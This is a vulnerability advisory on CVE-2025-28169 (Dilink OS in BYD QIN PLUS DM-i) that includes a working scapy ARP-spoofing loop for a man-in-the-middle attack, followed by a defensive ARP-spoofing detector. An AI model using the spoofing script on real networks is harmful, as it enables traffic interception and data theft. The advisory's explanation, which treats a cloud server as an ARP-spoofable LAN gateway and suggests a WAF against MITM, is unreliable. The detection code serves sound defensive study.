CVE-2025-28169: Unencrypted Broadcasts Lead to Potential Man-in-the-Middle Attacks on BYD QIN PLUS DM-i Dilink OS

Overview

CVE-2025-28169 affects Dilink OS v3.0_13.1.7.2204050.1 to v3.0_13.1.7.2312290.1_0 on the BYD QIN PLUS DM-i. The system sends unencrypted broadcasts to the manufacturer’s cloud server, which exposes it to potential man-in-the-middle attacks. The vulnerability is significant because it can lead to system compromise and leakage of sensitive data.

Vulnerability Summary

CVE ID: CVE-2025-28169
Severity: High, CVSS Score 8.1
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: Potential system compromise and data leakage

Affected Products

Product | Affected Versions
BYD QIN PLUS DM-i Dilink OS | v3.0_13.1.7.2204050.1 to v3.0_13.1.7.2312290.1_0

How the Exploit Works

The exploit takes advantage of the unencrypted broadcasts that the Dilink OS sends to the manufacturer’s cloud server. By intercepting these broadcasts, an attacker can execute a man-in-the-middle attack. This attack could allow the attacker to eavesdrop on the communication, manipulate the data, or even impersonate the server to gain unauthorized access to sensitive information.

Conceptual Example Code

Here is a conceptual example of a man-in-the-middle attack using Python:

import scapy.all as scapy

def get_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast/arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]
    return answered_list[0][1].hwsrc

def spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet, verbose=False)

target_ip = "10.0.2.7"
gateway_ip = "10.0.2.1"
while True:
    spoof(target_ip, gateway_ip)
    spoof(gateway_ip, target_ip)

In this example, the attacker spoofs the IP of the manufacturer’s cloud server (gateway_ip) and the IP of the Dilink OS (target_ip). The attacker then sends ARP responses to both targets, tricking them into believing that they are communicating with each other, while in reality, all their communication is going through the attacker’s machine.

Mitigation

The recommended mitigation for this vulnerability is to apply the vendor’s patch. If a patch is not available, using a Web Application Firewall (WAF) or Intrusion Detection System (IDS) could serve as temporary mitigation. These systems can help detect and prevent man-in-the-middle attacks by monitoring network traffic and identifying suspicious activity.
Remember, always stay vigilant and keep your systems updated to protect against the latest vulnerabilities.
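
One way an IDS-style monitor can flag the ARP cache poisoning shown in the conceptual example, given here as an added example that is not part of the original article or any vendor tooling: it parses raw ARP replies and alerts when an IP's MAC binding changes or when one MAC claims several IPs. The function names, MAC addresses and sample frames are constructed for illustration; only the 10.0.2.x addresses come from the article.

```python
import struct
from collections import defaultdict

def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip), or None if not Ethernet/IPv4 ARP."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":   # EtherType 0x0806 = ARP
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    sender_mac = ":".join(f"{b:02x}" for b in frame[22:28])
    sender_ip = ".".join(str(b) for b in frame[28:32])
    return op, sender_mac, sender_ip

def detect_arp_spoofing(frames):
    """Flag IP->MAC binding changes and MACs that claim more than one IP."""
    ip_to_mac, mac_to_ips, alerts = {}, defaultdict(set), []
    for n, frame in enumerate(frames):
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != 2:             # replies only (op=2)
            continue
        _, mac, ip = parsed
        known = ip_to_mac.setdefault(ip, mac)            # first-seen binding is the baseline
        if known != mac:
            alerts.append((n, "binding-change", ip, known, mac))
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1:
            alerts.append((n, "mac-claims-multiple-ips", mac, *sorted(mac_to_ips[mac])))
    return alerts

def sample_reply(src_mac, src_ip, dst_mac, dst_ip):
    """Assemble one constructed sample frame from hex fields (monitor input only)."""
    return bytes.fromhex(dst_mac + src_mac + "0806" + "0001080006040002"
                         + src_mac + src_ip + dst_mac + dst_ip)

# Constructed sample capture: all MAC addresses are made up.
GW, DILINK, ROGUE = "525400aa0001", "525400aa0007", "525400aa0066"
GW_IP, DILINK_IP = "0a000201", "0a000207"                # 10.0.2.1, 10.0.2.7
SAMPLE_FRAMES = [
    sample_reply(GW, GW_IP, DILINK, DILINK_IP),          # genuine gateway reply
    sample_reply(DILINK, DILINK_IP, GW, GW_IP),          # genuine Dilink host reply
    sample_reply(ROGUE, GW_IP, DILINK, DILINK_IP),       # forged: rogue MAC claims gateway IP
    sample_reply(ROGUE, DILINK_IP, GW, GW_IP),           # forged: rogue MAC claims Dilink IP
]

if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_FRAMES):
        print(alert)
```

A first-seen baseline is only as trustworthy as the first observation, so a deployed monitor would seed `ip_to_mac` from a known-good inventory rather than from live traffic.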

Disclaimer:

The information and code presented in this article are provided for educational and defensive cybersecurity purposes only. Any conceptual or pseudocode examples are simplified representations intended to raise awareness and promote secure development and system configuration practices.

Do not use this information to attempt unauthorized access or exploit vulnerabilities on systems that you do not own or have explicit permission to test.

Ameeba and its authors do not endorse or condone malicious behavior and are not responsible for misuse of the content. Always follow ethical hacking guidelines, responsible disclosure practices, and local laws.
